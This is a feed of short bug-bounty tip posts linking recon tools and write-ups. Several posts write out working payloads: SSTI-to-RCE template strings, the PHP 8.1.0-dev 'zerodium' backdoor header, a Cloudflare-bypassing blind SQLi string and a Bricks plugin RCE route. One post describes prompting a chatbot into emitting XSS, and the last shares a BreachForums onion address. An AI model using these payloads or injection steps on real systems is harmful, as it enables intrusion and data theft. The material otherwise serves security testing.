Ismail

📼 All about Virtual Host's in Bug Bounty – Uncover Hidden Web Assets Blog: freecodecamp.org/news/virtual-h… Author: Nairuz Abulhul (@freeCodeCamp)

🔥SSTI to RCE in URL POC: target.com/docs/1.0/123 = not found target.com/docs/1.0/?123 = now reflecting in source code like /docs/1.0/?123# target.com/docs/1.0/?{{7*7}} = /docs/1.0/?49# ☑️ RCE: /docs/1.0/?{{phpinfo()}} #infosec #bugbounty #bugbountytips

Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = linkedin.com/in/0xsojalsec?… #infosec #cybersec #bugbountytips

Unauth RCE in Bricks ≤1.9.6 The /bricks-api/import endpoint allows unauthenticated template imports; attacker-controlled JSON can carry PHP/payloads that the render_element routine processes in an eval‑like manner, resulting in full RCE. #WordPress #RCE #BugBounty

🧠 SSTI → Remote Code Execution 1️⃣ App renders user input in template engine 2️⃣ Attacker sends payload: {{7*7}} 3️⃣ Output: 49 → confirms injection 4️⃣ Escalates to: {{self._globals.os.popen('id').read()}} 🎯 Full RCE via template context #bugbounty #ssti #rce #infosec

If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #bugbountytips #rce #sqli #cybersecurity

10 common JavaScript coding vulnerabilities Practical code examples.🐞💻 1- Open Redirect 2-SSRF 3-Timing Attacks 4-prototype pollution 5-NoSQLi 6-ReDoS 7-misconfiguration 8-Hard Code Vulnerability 9-mass assignment 10-Host Header Injection #BugBountyTip youtube.com/watch?v=ypNKKY…

Define the depth of your crawl with katana's -d flag. The higher the depth, the more recursive crawls and juicy data you get! 🤤 ⚠️ Higher depths can lead to long crawl times against large web applications.

💉 Complete Guide: The SQL Injection Knowledge Base Website: websec.ca/kb/sql_injecti… author: Roberto Salgado #infosec

JShunter JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers, bug bounty and security researchers. github.com/cc1a2b/JShunter

Someone make a subdomains database containing 1.6 billion subdomains scrapped from multiple public (and private) sources. This database is now public and FREE and can be queried on the following website. - dash.pugrecon.celes.in #infosec #cybersec #bugbountytips

My New tool s3 ✅ github.com/KingOfBugbount… #bugbounty #bugbountytips #tools #ofjaaah

Misconfig Mapper: A fast tool to help you uncover security misconfigurations on popular third-party services used by your company and/or bug bounty targets GitHub: github.com/intigriti/misc…

I just published a new writeup about Authentication Bypass vulnerability on coinmarketcap. 0xbartita.medium.com/how-i-found-an… #bugbountytips #bugbountytip

Insecure Direct Object Reference (IDOR) Checklist credit : @elsec #bugbounty #bugbountytips #bughunting #penetrationtesting #pentesting #pentest #ethicalhacking #hacking #cybersecuritytips #cybersecurity #informationsecurity #infosec #bugcrowd #bugbountytips #bugbounty

Find the origin servers of websites protected by Cloudflare, Sucuri, or Incapsula with a misconfigured DNS. ⚔️ - github.com/MrH0wl/Cloudma… Credit: @0x0SojalSec #infosec #bugbountytips #Cybersecurity

Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi

XSS via Prompt Injection 💥🧠🔓 🤖 Find a chatbot 🧠 Ask what model it is 🔁 Get it to repeat text ⚠️ Make it say: '"><img src=x onerror=alert()> 💥 Escalate to Reflected/Stored XSS via URL param

🚨 New Writeup Alert! 🚨 "I Automated CSP Extraction and Mapped 100+ Subdomains" by Ibtissam hammadi is now live on IW! Check it out here: infosecwriteups.com/adf04880ea5d #cybersecurity #infosec #csp #reconnaissance #bugbounty

BreachForums has possibly returned at their original Onion address with what looks like it's original data. I verified the Canary with the PGP and it is valid. http://breached26tezcofqla4adzyn22notfqwcac7gpbrleg4usehljwkgqd[.]onion